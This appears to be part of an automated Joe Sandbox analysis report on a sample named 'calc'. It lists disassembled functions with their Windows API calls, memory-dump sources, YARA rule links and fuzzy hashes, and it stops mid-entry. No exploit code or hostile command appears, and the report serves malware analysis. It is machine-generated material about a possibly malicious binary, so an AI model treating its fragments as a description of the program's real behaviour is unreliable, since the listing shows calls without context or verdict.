    Function 004509A2 Relevance: 6.1, APIs: 4, Instructions: 113COMMON
    Download Yara Rule
    APIs
    • __lock.LIBCMT ref: 004509C4
      • Part of subcall function 0044C6DB: RtlEnterCriticalSection.KERNEL32(?,?,?,00449CAB,00000004,0045B078,0000000C,0044C5F4,00000000,?,0044C583,?,0045B1B8,00000060), ref: 0044C703
    • __lock.LIBCMT ref: 00450A10
    • RtlEnterCriticalSection.KERNEL32(0000008C,0045BA48,00000014,00455D3A,?,00000000,00000000), ref: 00450A5A
    • RtlLeaveCriticalSection.KERNEL32(0000008C), ref: 00450A67
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: CriticalSection$Enter__lock$Leave
    • String ID:
    • API String ID: 885841014-0
    • Opcode ID: 1badaa9ec21e417f803595b66445f34ecdf99ab9db07a4bdb5d0facb741ff5c6
    • Instruction ID: 6b8fed09be344907abc40a60ecb9e95b28ef36bf5e0b8bb1f7086c56b98dbfe0
    • Opcode Fuzzy Hash: 1badaa9ec21e417f803595b66445f34ecdf99ab9db07a4bdb5d0facb741ff5c6
    • Instruction Fuzzy Hash: 8D4133759003068BDB24DF64D88575E7BE0AF11329F25872FE832962D2CB389989CB0C
    Function 0040C4BD Relevance: 6.1, APIs: 4, Instructions: 102COMMON
    Download Yara Rule
    APIs
    • BeginPaint.USER32(?,?), ref: 0040C4DF
    • SetViewportOrgEx.GDI32(?,?,?,00000000), ref: 0040C544
    • Rectangle.GDI32(?,00000000,00000000,?,?), ref: 0040C596
    • EndPaint.USER32(?,?,?,?,?,?,?,00000000,00000000,?,?,?,?,00000000,00000001), ref: 0040C5EE
      • Part of subcall function 0040D03A: MoveToEx.GDI32(?,?,?,00000000), ref: 0040D047
      • Part of subcall function 0040D03A: LineTo.GDI32(?,?,?), ref: 0040D05A
      • Part of subcall function 0040D03A: LineTo.GDI32(?,?,?), ref: 0040D063
      • Part of subcall function 0040D03A: LineTo.GDI32(?,?,?), ref: 0040D06C
      • Part of subcall function 0040D03A: LineTo.GDI32(?,?,?), ref: 0040D075
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: Line$Paint$BeginMoveRectangleViewport
    • String ID:
    • API String ID: 2658531208-0
    • Opcode ID: b5603e31384557df77967fefead3580476fc508b409ebf9dc0690b9044ca4220
    • Instruction ID: c6e67966df92c8fb1309ec1158f403bbbcdfb1cf059d0a129d19c9ce180b40a5
    • Opcode Fuzzy Hash: b5603e31384557df77967fefead3580476fc508b409ebf9dc0690b9044ca4220
    • Instruction Fuzzy Hash: E3418C34500214FFDB109F65CC84BEEBBB5AF04720F1442AAE955AB2E2C778AD86DB14
    Function 00409DE3 Relevance: 6.1, APIs: 4, Instructions: 94windowCOMMON
    Download Yara Rule
    APIs
    • InvalidateRect.USER32(?,00000000,00000001,?,?), ref: 00409E59
    • SendMessageW.USER32(?,00001024,00000000,?), ref: 00409E74
    • 73A245F0.USER32(?,000000F0,?,?), ref: 00409EB1
    • 73A259E0.USER32(?,000000F0,00000000,?,000000F0,?,?), ref: 00409EC0
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: A245A259InvalidateMessageRectSend
    • String ID:
    • API String ID: 2466167897-0
    • Opcode ID: ad4f60456986191052909b057eca21ebd8f5f73e94f160d2830911a97601eff1
    • Instruction ID: de805cdf63f82dce9eb4448b0b3695e0071d1639926267ef63824eb0b7256b8a
    • Opcode Fuzzy Hash: ad4f60456986191052909b057eca21ebd8f5f73e94f160d2830911a97601eff1
    • Instruction Fuzzy Hash: 0731C231500204BAEF20CA28CD49BAF7BA9AB05351F200937FA42F62D3D779ED4186C9
    Function 00457BDC Relevance: 6.1, APIs: 4, Instructions: 93COMMON
    Download Yara Rule
    APIs
      • Part of subcall function 0044D99A: VirtualQuery.KERNEL32(?,?,0000001C), ref: 0044D9B4
      • Part of subcall function 0044D99A: GetSystemInfo.KERNEL32(?,?,?,0000001C), ref: 0044D9C5
      • Part of subcall function 0044D99A: VirtualQuery.KERNEL32(?,?,0000001C,?,?,0000001C), ref: 0044DA0B
    • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,?,0045BBD8,00000000,?,00455B83,00000000,?,00000000,00000000,00000000,00000000,0045282B,0045BBD0), ref: 00457C22
    • MultiByteToWideChar.KERNEL32(00000000,00000009,00000018,?,00000000,00000000,?,00455B83,00000000,?,00000000,00000000,00000000,00000000,0045282B,0045BBD0), ref: 00457C3F
    • MultiByteToWideChar.KERNEL32(00000000,00000001,00000018,?,?,00000000,?,00455B83,00000000,?,00000000,00000000,00000000,00000000,0045282B,0045BBD0), ref: 00457CB5
    • CompareStringW.KERNEL32(?,00000002,0045BBD8,00000000,?,00000000,?,00000000,?,00455B83,00000000,?,00000000,00000000,00000000,00000000), ref: 00457CCB
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: ByteCharMultiWide$QueryVirtual$CompareInfoStringSystem
    • String ID:
    • API String ID: 1997773198-0
    • Opcode ID: 5f7718d66c8a2356cb5fe9332cfe4e066da279ae71b650be9feefc5369334bdb
    • Instruction ID: a5633a3a0502486586b9ec731d308d5a0470a2ef10469a9c99ac855557056afc
    • Opcode Fuzzy Hash: 5f7718d66c8a2356cb5fe9332cfe4e066da279ae71b650be9feefc5369334bdb
    • Instruction Fuzzy Hash: 58319031800208EBEF22DFA0EC45BDEBBB6FF04715F24012AF915AA2A1C7398D55DB04
    Function 00450CF4 Relevance: 6.1, APIs: 4, Instructions: 93COMMON
    Download Yara Rule
    APIs
      • Part of subcall function 0044D99A: VirtualQuery.KERNEL32(?,?,0000001C), ref: 0044D9B4
      • Part of subcall function 0044D99A: GetSystemInfo.KERNEL32(?,?,?,0000001C), ref: 0044D9C5
      • Part of subcall function 0044D99A: VirtualQuery.KERNEL32(?,?,0000001C,?,?,0000001C), ref: 0044DA0B
    • WideCharToMultiByte.KERNEL32(?,00000000,004014B8,?,?,?,00000000,00000000,?,004490FC,?,00000000,0047BCF4,?,?), ref: 00450D32
    • LCMapStringA.KERNEL32(?,00000100,?,?,00000000,00000000,?,004490FC,?,00000000,0047BCF4,?,?,?,?,004014B8), ref: 00450D4E
    • LCMapStringA.KERNEL32(?,00000100,?,?,?,00000000,?,004490FC,?,00000000,0047BCF4,?,?,?,?,004014B8), ref: 00450DBA
    • _strncpy.LIBCMT ref: 00450DDF
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: QueryStringVirtual$ByteCharInfoMultiSystemWide_strncpy
    • String ID:
    • API String ID: 1411509361-0
    • Opcode ID: bcb1a6769d5935a3c911a9c01831fe4f50dad6d811bd1304a43de61f0aaa8521
    • Instruction ID: a8fa9c9e81d149e0fd57e576100391c0807143c9fde817d248a89193a1360640
    • Opcode Fuzzy Hash: bcb1a6769d5935a3c911a9c01831fe4f50dad6d811bd1304a43de61f0aaa8521
    • Instruction Fuzzy Hash: 1F315B76C0011AEBDF119F95CC829EFBBB5EF08316F18852AF92062162C7394D56DF98
    Function 00405D95 Relevance: 6.1, APIs: 4, Instructions: 91windowCOMMON
    Download Yara Rule
    APIs
    • ClientToScreen.USER32(?,?), ref: 00405DB3
    • GetWindowRect.USER32(00000003,?), ref: 00405DFC
    • PtInRect.USER32(?,00000000,000000FF), ref: 00405E0C
    • MessageBeep.USER32(00000000), ref: 00405E7F
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: Rect$BeepClientMessageScreenWindow
    • String ID:
    • API String ID: 1352109105-0
    • Opcode ID: dcf3ca20a4c2ae2ed243af5031a055c5e736d4f7eb66e569f9db8ee6816ab8dd
    • Instruction ID: dd8de1245b502091c838f5f47c16c6050819199c23e6a8110bf6000abb39bdf8
    • Opcode Fuzzy Hash: dcf3ca20a4c2ae2ed243af5031a055c5e736d4f7eb66e569f9db8ee6816ab8dd
    • Instruction Fuzzy Hash: FF310631900619EFCB10CFA8C848AABBBF4EF04355F14456AE9A5B62D0D338AE45CF95
    Function 004414F2 Relevance: 6.1, APIs: 4, Instructions: 88COMMON
    Download Yara Rule
    APIs
      • Part of subcall function 0040D903: LoadLibraryA.KERNEL32(user32.dll,0040AD7E), ref: 0040D90E
      • Part of subcall function 0040D903: GetProcAddress.KERNEL32(00000000,SetLayeredWindowAttributes), ref: 0040D920
    • 73A245F0.USER32(?,000000EC,?,00000001), ref: 00441574
    • 73A259E0.USER32(?,000000EC,00000000,?,000000EC,?,00000001), ref: 0044158F
    • 73A259E0.USER32(?,000000EC,00000000,?,000000EC,?,00000001), ref: 0044159D
    • FreeLibrary.KERNEL32(00000000,00000000,?,00000001), ref: 004415D5
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: A259Library$A245AddressFreeLoadProc
    • String ID:
    • API String ID: 537673472-0
    • Opcode ID: 971167c66a0a2234d59ac2ff61b654058d20afa75a7dbba9d852b5f10beb4d21
    • Instruction ID: 7c8fdcabddd7c3b7ec258e7c190052c285894457d6cea74eacef502c953c9f09
    • Opcode Fuzzy Hash: 971167c66a0a2234d59ac2ff61b654058d20afa75a7dbba9d852b5f10beb4d21
    • Instruction Fuzzy Hash: DC31D131904204FFEB10AF55CC45AEE77B8AF41365F10856AF813A71A2D778ED85CB58
    Function 0041181E Relevance: 6.1, APIs: 4, Instructions: 84keyboardwindowCOMMON
    Download Yara Rule
    APIs
    • MapVirtualKeyW.USER32(00000011,00000000), ref: 00411831
    • GetKeyboardState.USER32(?), ref: 0041186B
    • SetKeyboardState.USER32(00000080), ref: 00411880
    • PostMessageW.USER32(?,00000100,00000011,00000000), ref: 004118D4
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: KeyboardState$MessagePostVirtual
    • String ID:
    • API String ID: 863366817-0
    • Opcode ID: bfb4b78a6aaed89bb3859a60d9aecc9fb928bdbecd9a5f803ab5092cb477fe57
    • Instruction ID: 51936c8d46dd67df7a5012feef2705db3bfc497a99d119d8ced5b6907d56545e
    • Opcode Fuzzy Hash: bfb4b78a6aaed89bb3859a60d9aecc9fb928bdbecd9a5f803ab5092cb477fe57
    • Instruction Fuzzy Hash: BD212F71A003157BEB3567698CC8BE76A5CAB05355F10413BF74991272D7ACDCC0C29D
    Function 00411916 Relevance: 6.1, APIs: 4, Instructions: 84keyboardwindowCOMMON
    Download Yara Rule
    APIs
    • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00411929
    • GetKeyboardState.USER32(?), ref: 00411967
    • PostMessageW.USER32(?,00000101,000000A0,00000000), ref: 004119C1
    • SetKeyboardState.USER32(?), ref: 004119D8
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: KeyboardState$MessagePostVirtual
    • String ID:
    • API String ID: 863366817-0
    • Opcode ID: a81da1ac17faf62712921bae63e7622cf4e8409ec3e79e3e80d14285f257a8ae
    • Instruction ID: 9c36f65ea7ddc444ccb7cc2cff4a635faba03942e7bfa2e0ea98a349dbe43b6b
    • Opcode Fuzzy Hash: a81da1ac17faf62712921bae63e7622cf4e8409ec3e79e3e80d14285f257a8ae
    • Instruction Fuzzy Hash: 892137B17102187AEB314768CC99FEB6A5CDB06394F540127F669922B2C2ADCCC1C6AC
    Function 0042F490 Relevance: 6.1, APIs: 4, Instructions: 71networkCOMMON
    Download Yara Rule
    APIs
    • select.WSOCK32(00000000,00000001,00000000,00000000,?), ref: 0042F4F2
    • __WSAFDIsSet.WSOCK32(00000000,00000001,00000000,00000001,00000000,00000000,?), ref: 0042F50C
    • accept.WSOCK32(00000000,00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,?), ref: 0042F51F
    • WSAGetLastError.WSOCK32(00000000,00000000,00000001,00000000,00000000,?), ref: 0042F528
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: ErrorLastacceptselect
    • String ID:
    • API String ID: 385091864-0
    • Opcode ID: 755a0d37a7a288ac79227b46faa216e6589971c12026bb35bcb87805b5d0fce9
    • Instruction ID: c4cb769e5f6c09977091af05dbcfb972cb8144af55259ba7b3911f342b50bbba
    • Opcode Fuzzy Hash: 755a0d37a7a288ac79227b46faa216e6589971c12026bb35bcb87805b5d0fce9
    • Instruction Fuzzy Hash: E911E171A00118ABDB15EF2ADC819EFB7FCAB49714F40427FB405D3242DA789E808BA4
    Function 0042003A Relevance: 6.1, APIs: 4, Instructions: 70windowCOMMON
    Download Yara Rule
    APIs
    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00420064
    • TranslateMessage.USER32(?), ref: 0042008B
    • DispatchMessageW.USER32(?), ref: 00420095
    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 004200A5
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: Message$Peek$DispatchTranslate
    • String ID:
    • API String ID: 1795658109-0
    • Opcode ID: 9024c2977bfdbd5ac00eb1186ad899a131a143131b69003cd44eda1b14e214a5
    • Instruction ID: d6d8623c54d9b74e91df51d2b51a13610eb9f86121000978df8a1a571116bf05
    • Opcode Fuzzy Hash: 9024c2977bfdbd5ac00eb1186ad899a131a143131b69003cd44eda1b14e214a5
    • Instruction Fuzzy Hash: 3B1187B2A053559EEB119BB4BC88BB77BECA701309F44843AD152D3102E778D84ADB79
    Function 0044B66E Relevance: 6.1, APIs: 4, Instructions: 69threadCOMMON
    Download Yara Rule
    APIs
    • CloseHandle.KERNEL32(?), ref: 0044B696
    • RtlExitUserThread.KERNEL32(00000000), ref: 0044B6A5
    • FlsGetValue.KERNEL32(0045B188,0000000C), ref: 0044B6BE
    • FlsSetValue.KERNEL32(?), ref: 0044B6D4
      • Part of subcall function 00449C88: __lock.LIBCMT ref: 00449CA6
      • Part of subcall function 00449C88: RtlFreeHeap.NTDLL(00000000,?,0045B078,0000000C,0044C5F4,00000000,?,0044C583,?,0045B1B8,00000060), ref: 00449CED
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: Value$CloseExitFreeHandleHeapThreadUser__lock
    • String ID:
    • API String ID: 3768287693-0
    • Opcode ID: 109cce47434b9ebce4b4339c59462751187b986e7b0bd7b332a31fc78335e7f8
    • Instruction ID: d4f00fcacf70c5f03d956f577aab7a395bcd786e41b93a042494b8fd7fe282cd
    • Opcode Fuzzy Hash: 109cce47434b9ebce4b4339c59462751187b986e7b0bd7b332a31fc78335e7f8
    • Instruction Fuzzy Hash: F1219631500B00EFE724AF65D94AA6A37A4FF44755F11451EF845973A1DF78EC00CA9A
    Function 00403C97 Relevance: 6.1, APIs: 4, Instructions: 67windowCOMMON
    Download Yara Rule
    APIs
    • IsWindowVisible.USER32(?), ref: 00403CA0
    • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00403CBF
    • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00403CDD
    • CharUpperBuffW.USER32(?,00000000,?,?,?,?,00403C93,?), ref: 00403CFB
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: MessageSend$BuffCharUpperVisibleWindow
    • String ID:
    • API String ID: 2796087071-0
    • Opcode ID: 3b77f46b9c1fa0076cf940b998f95cb4e1292013ceaaf7debd539c10549d309b
    • Instruction ID: 5bedeb9e09b6abb0eb7ebfe7bc79414f8d824c24300506fe996c0fb54aef253c
    • Opcode Fuzzy Hash: 3b77f46b9c1fa0076cf940b998f95cb4e1292013ceaaf7debd539c10549d309b
    • Instruction Fuzzy Hash: 1011B232904258BAFF229FA1DC06F9B7F6DDF40725F20407AF800A51A1DB79CE50A758
    Function 0040CF77 Relevance: 6.1, APIs: 4, Instructions: 66COMMON
    Download Yara Rule
    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: _logf$LineMove
    • String ID:
    • API String ID: 2044247434-0
    • Opcode ID: 7b0958b1e05d44bb2692c91de32216addb6b67a0baac5db24a1264da40054095
    • Instruction ID: 36068e2f271c58dd6b3b91538d1304b6c8909b614552cdb76d913315e2bc621b
    • Opcode Fuzzy Hash: 7b0958b1e05d44bb2692c91de32216addb6b67a0baac5db24a1264da40054095
    • Instruction Fuzzy Hash: E421EF72900209EFCB00AF91EB499AEBF74FB00351F2144A9E981721A5D7748E30EB5A
    Function 0044AFC4 Relevance: 6.1, APIs: 4, Instructions: 65threadCOMMON
    Download Yara Rule
    APIs
    • RtlExitUserThread.KERNEL32(?), ref: 0044AFEE
    • FlsGetValue.KERNEL32(0045B130,0000000C), ref: 0044B007
    • FlsSetValue.KERNEL32(?), ref: 0044B01D
    • GetCurrentThreadId.KERNEL32 ref: 0044B02F
      • Part of subcall function 00449C88: __lock.LIBCMT ref: 00449CA6
      • Part of subcall function 00449C88: RtlFreeHeap.NTDLL(00000000,?,0045B078,0000000C,0044C5F4,00000000,?,0044C583,?,0045B1B8,00000060), ref: 00449CED
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: ThreadValue$CurrentExitFreeHeapUser__lock
    • String ID:
    • API String ID: 1595110423-0
    • Opcode ID: 26526b7b9b487d2d6954b45c4d40f43203c1634cc27ce7a173ca8e6a3720cd75
    • Instruction ID: 87a9b2721909ca5a519c4814913f14622166ecacfafa37e2c11cce841412ba36
    • Opcode Fuzzy Hash: 26526b7b9b487d2d6954b45c4d40f43203c1634cc27ce7a173ca8e6a3720cd75
    • Instruction Fuzzy Hash: 4611B431500B01EFEB24AF61DC0AA6B3BA4FF04755B10042EF8469B3A1DB78EC40CB99
    Function 00415937 Relevance: 6.1, APIs: 4, Instructions: 63windowCOMMON
    Download Yara Rule
    APIs
    • 73A26A70.USER32(?,Function_0001595C,00467A20,?,0043F72A,?,00000001), ref: 00415952
